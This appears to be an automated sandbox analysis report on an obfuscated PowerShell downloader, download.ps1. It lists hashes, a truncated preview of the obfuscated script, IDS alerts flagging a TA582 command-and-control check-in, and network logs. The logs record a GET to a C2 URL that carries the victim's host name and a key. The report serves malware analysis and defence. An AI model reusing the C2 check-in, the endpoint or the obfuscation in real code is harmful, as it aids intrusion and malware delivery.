                                                                                                    Preview:...................................FL..................F.".. .....*_...`.$R.d..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...b.UN.d...h:R.d......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=+Z.D..........................3*N.A.p.p.D.a.t.a...B.V.1.....+Z.D..Roaming.@......EW.=+Z.D...........................sM.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=+Z.D..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=+Z.D..........................vC!.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=+Z.D....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=+Z.D....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=+Z.D....9...........
                                                                                                    File type:ASCII text, with very long lines (10898), with CRLF line terminators
                                                                                                    Entropy (8bit):5.943165680685654
                                                                                                    TrID:
                                                                                                      File name:download.ps1
                                                                                                      File size:20'643 bytes
                                                                                                      MD5:81b74a62ffc263437801f0e3dbc1b1eb
                                                                                                      SHA1:f1649560edbc7742352cec091f4dc26922d9bdcb
                                                                                                      SHA256:9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71
                                                                                                      SHA512:45e2de5567ec6174d4cb91f2d7995f0fa2b5bfbe43897253a2bd2e6303f9d8752455f0c07c2789adda0d2f743ebdf345e8586dee605f76bc1eebdd704bbfcbb5
                                                                                                      SSDEEP:384:FkqH4yQGBHxjB5FRLHC7OmB7eR7pL4+h2+ntWEPp5gOCbh77t18im65W6gipzvR:Fk4b5jB5FRLi75aR7yczobh3t18ik6lz
                                                                                                      TLSH:F4926DE16784E4A2C7CEC72E7A07BC197F11342FE4D9B6C4F298E68266927006D4DCD2
                                                                                                      File Content Preview:$gmpuvkadj=$executioncontext;$esontionaredtionenaroren = ([CHaR[]]@((5081-5028),(5083-5031),(-2900+(9386-6429)),(59450/(6800-5611)),(66024/1179),(1258-1204),(9944-(33144576/(-5084+8436))),(406670/(35705626/4829)),(506770/(88472828/(56680606/5903))),(2862-
                                                                                                      Icon Hash:3270d6baae77db44
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-01-11T09:39:36.407884+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.74969945.61.136.13880TCP
                                                                                                      2025-01-11T09:39:36.407884+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.74969945.61.136.13880TCP
                                                                                                      2025-01-11T09:39:37.059944+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.749700172.217.16.19680TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 11, 2025 09:39:35.607599974 CET4969980192.168.2.745.61.136.138
                                                                                                      Jan 11, 2025 09:39:35.612485886 CET804969945.61.136.138192.168.2.7
                                                                                                      Jan 11, 2025 09:39:35.612579107 CET4969980192.168.2.745.61.136.138
                                                                                                      Jan 11, 2025 09:39:35.615983009 CET4969980192.168.2.745.61.136.138
                                                                                                      Jan 11, 2025 09:39:35.620814085 CET804969945.61.136.138192.168.2.7
                                                                                                      Jan 11, 2025 09:39:36.361263037 CET804969945.61.136.138192.168.2.7
                                                                                                      Jan 11, 2025 09:39:36.373199940 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:36.378161907 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:36.378269911 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:36.378765106 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:36.383625031 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:36.407883883 CET4969980192.168.2.745.61.136.138
                                                                                                      Jan 11, 2025 09:39:37.059835911 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059858084 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059870005 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059880972 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059896946 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059909105 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059917927 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059931040 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.059943914 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.059989929 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.060025930 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.060036898 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.060086966 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.064841032 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.064873934 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.064929962 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.146234035 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150331020 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150348902 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150362015 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150398970 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.150435925 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.150444031 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150456905 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.150495052 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.155575037 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.155661106 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.155673027 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.155699015 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.168878078 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.168916941 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.168927908 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.168953896 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.168955088 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.168967962 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.168986082 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.169022083 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.174484968 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.174500942 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.174513102 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.174547911 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.180821896 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.180851936 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.180864096 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.180875063 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.180926085 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.187086105 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.187146902 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.187159061 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.187196016 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.193351030 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.193365097 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.193411112 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.193424940 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.193435907 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.193461895 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.199775934 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.199789047 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.199831963 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.240838051 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240855932 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240916967 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240927935 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240945101 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240951061 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.240955114 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.240967989 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.241024971 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.242047071 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.242070913 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.242082119 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.242100000 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.242120981 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.248436928 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.248451948 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.248464108 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.248498917 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.254687071 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.254723072 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.254735947 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.254750967 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.254776001 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.265084982 CET8049700172.217.16.196192.168.2.7
                                                                                                      Jan 11, 2025 09:39:37.314172983 CET4970080192.168.2.7172.217.16.196
                                                                                                      Jan 11, 2025 09:39:37.551572084 CET4969980192.168.2.745.61.136.138
                                                                                                      Jan 11, 2025 09:39:37.552818060 CET4970080192.168.2.7172.217.16.196
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 11, 2025 09:39:35.382110119 CET6456353192.168.2.71.1.1.1
                                                                                                      Jan 11, 2025 09:39:35.594326019 CET53645631.1.1.1192.168.2.7
                                                                                                      Jan 11, 2025 09:39:36.363171101 CET6174053192.168.2.71.1.1.1
                                                                                                      Jan 11, 2025 09:39:36.370098114 CET53617401.1.1.1192.168.2.7
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Jan 11, 2025 09:39:35.382110119 CET192.168.2.71.1.1.10xa644Standard query (0)kmaealcfcalhcac.topA (IP address)IN (0x0001)false
                                                                                                      Jan 11, 2025 09:39:36.363171101 CET192.168.2.71.1.1.10xaa7bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Jan 11, 2025 09:39:35.594326019 CET1.1.1.1192.168.2.70xa644No error (0)kmaealcfcalhcac.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                      Jan 11, 2025 09:39:36.370098114 CET1.1.1.1192.168.2.70xaa7bNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                      • kmaealcfcalhcac.top
                                                                                                      • www.google.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.74969945.61.136.138806632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Jan 11, 2025 09:39:35.615983009 CET219OUTGET /92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: kmaealcfcalhcac.top
                                                                                                      Connection: Keep-Alive
                                                                                                      Jan 11, 2025 09:39:36.361263037 CET166INHTTP/1.1 302 Found
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Sat, 11 Jan 2025 08:39:36 GMT
                                                                                                      Content-Length: 0
                                                                                                      Connection: keep-alive
                                                                                                      Location: http://www.google.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749700172.217.16.196806632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Jan 11, 2025 09:39:36.378765106 CET159OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: www.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Jan 11, 2025 09:39:37.059835911 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 11 Jan 2025 08:39:36 GMT
                                                                                                      Expires: -1
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-YzAnSkY_RAAeGn5oVSjY4g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                      Server: gws
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Set-Cookie: AEC=AZ6Zc-Xg2skDO5WTNQWjRHmkrhxoaMdm7yzbIE_eqS5-ADKFajp4J2uEwQ; expires=Thu, 10-Jul-2025 08:39:36 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                      Set-Cookie: NID=520=E8mHugLRNuJXMN7fI2nBOg3NBrf6g19hoOE6GEckggazAfybxLpkOnkBkFpExlROZ_lzOZWfMII-m3CRBgdMFcOlPcJ6h9OGBM1D1ELuuzmsEHa9xl4HGJgP6OAsxcas12jYpP9T0Hu89VGL8In7cMJuLMBXoWYNHxAALeva5vqD7l0rOdgCltEP2KxVYotVplR6OIVA; expires=Sun, 13-Jul-2025 08:39:36 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                      Accept-Ranges: none
                                                                                                      Vary: Accept-Encoding
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 35 64 66 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                      Data Ascii: 5df5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                      Jan 11, 2025 09:39:37.059858084 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                      Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/ima
                                                                                                      Jan 11, 2025 09:39:37.059870005 CET1236INData Raw: 34 35 2c 39 33 2c 32 36 37 2c 31 2c 34 34 33 2c 38 32 2c 33 36 38 2c 33 31 35 2c 31 2c 32 36 34 2c 33 35 2c 34 38 2c 34 31 36 2c 32 2c 36 33 32 2c 38 2c 31 38 36 2c 31 2c 31 36 32 2c 39 37 2c 36 36 37 2c 35 32 37 2c 34 39 38 2c 38 37 30 2c 32 2c
                                                                                                      Data Ascii: 45,93,267,1,443,82,368,315,1,264,35,48,416,2,632,8,186,1,162,97,667,527,498,870,2,165,181,638,193,531,5,921,624,57,885,22,651,34,23,66,334,8,216,11,452,40,1189,110,80,495,152,6,269,2,84,430,2,7,1,242,1,384,2,254,150,743,249,142,256,346,63,178,
                                                                                                      Jan 11, 2025 09:39:37.059880972 CET1236INData Raw: 3d 22 29 3d 3d 3d 2d 31 26 26 61 21 3d 3d 22 73 6c 68 22 3b 63 3d 22 26 7a 78 3d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 67 2e 5f 63 73 68 69 64 26 26 66 26 26 28 63 2b 3d 22 26 63 73 68 69 64 3d 22 2b 67 2e 5f 63
                                                                                                      Data Ascii: =")===-1&&a!=="slh";c="&zx="+Date.now().toString();g._cshid&&f&&(c+="&cshid="+g._cshid);(d=d())&&(c+="&opi="+d);return"/"+(h||"gen_204")+"?atyp=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){
                                                                                                      Jan 11, 2025 09:39:37.059896946 CET704INData Raw: 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 63 3d 3d 3d 22 31 22 7c 7c 63 3d 3d 3d 22 71 22 26 26 21 61 2e 65 6c 65 6d 65
                                                                                                      Data Ascii: (a=b.target){var c=a.getAttribute("data-submitfalse");a=c==="1"||c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.targe
                                                                                                      Jan 11, 2025 09:39:37.059909105 CET1236INData Raw: 2e 67 62 74 6f 20 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 23 67 62 78 33 2c 23 67 62 78 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 64 32 64 32 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e
                                                                                                      Data Ascii: .gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1
                                                                                                      Jan 11, 2025 09:39:37.059917927 CET1236INData Raw: 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30
                                                                                                      Data Ascii: 4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative;top:-1px;border-style:solid dashed dashed;border-color:transparent;border-top-color
                                                                                                      Jan 11, 2025 09:39:37.059931040 CET1236INData Raw: 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a
                                                                                                      Data Ascii: op:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb
                                                                                                      Jan 11, 2025 09:39:37.060025930 CET1236INData Raw: 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a
                                                                                                      Data Ascii: id{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{fon
                                                                                                      Jan 11, 2025 09:39:37.060036898 CET896INData Raw: 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 6c 62 77 7b 63 6f 6c 6f 72 3a 23 63 63 63
                                                                                                      Data Ascii: ,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:none !important}.gbm0l,.gbm0l:vi
                                                                                                      Jan 11, 2025 09:39:37.064841032 CET1236INData Raw: 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68
                                                                                                      Data Ascii: bmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*di


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:03:39:25
                                                                                                      Start date:11/01/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:03:39:25
                                                                                                      Start date:11/01/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: kT|h$kT|h
                                                                                                        • API String ID: 0-1426874809
                                                                                                        • Opcode ID: 1d314d6da3203a7c5c42d54575c5040f7a15e8a0f443cba1f34cd45f5d5e0f55
                                                                                                        • Instruction ID: 159665fd11fec9967d7a677489ee40c9994ab42a28db7889fe3de091fdaf498e
                                                                                                        • Opcode Fuzzy Hash: 1d314d6da3203a7c5c42d54575c5040f7a15e8a0f443cba1f34cd45f5d5e0f55
                                                                                                        • Instruction Fuzzy Hash: 9DF1A230909A4E8FEBA9DF28C8597E937D1FF55310F44826EE84DC7291DB34A945CB82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: kT|h$kT|h
                                                                                                        • API String ID: 0-1426874809
                                                                                                        • Opcode ID: cf4eb373688015343d49ab6ae5f768461cf4915e329dd2520c664a5924379c4d
                                                                                                        • Instruction ID: 6e4435ce3236b421177ab0ecc9e8fc57e11627abd3de08ccf5d72cd9bf87d979
                                                                                                        • Opcode Fuzzy Hash: cf4eb373688015343d49ab6ae5f768461cf4915e329dd2520c664a5924379c4d
                                                                                                        • Instruction Fuzzy Hash: C0E1B330909A8E8FEBA8DF28C8597E937D1FB55314F04826ED84DC7291DA78E9448BC1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1416757497.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: kT|h$kT|h
                                                                                                        • API String ID: 0-1426874809
                                                                                                        • Opcode ID: 09d21dc04f499b717a889969e461e454a7ce135f97ff832e55e1b8aa36701725
                                                                                                        • Instruction ID: 636fb0913efce3b5cf9ca93d29fab722e239fd80083308f0c6c1899e4db8e963
                                                                                                        • Opcode Fuzzy Hash: 09d21dc04f499b717a889969e461e454a7ce135f97ff832e55e1b8aa36701725
                                                                                                        • Instruction Fuzzy Hash: B6B1C57050DA8D8FEB68DF28D8597E93BE1FF55310F04826EE84DC7292CA349945CB86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1415625704.00007FFAAC34D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC34D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffaac34d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
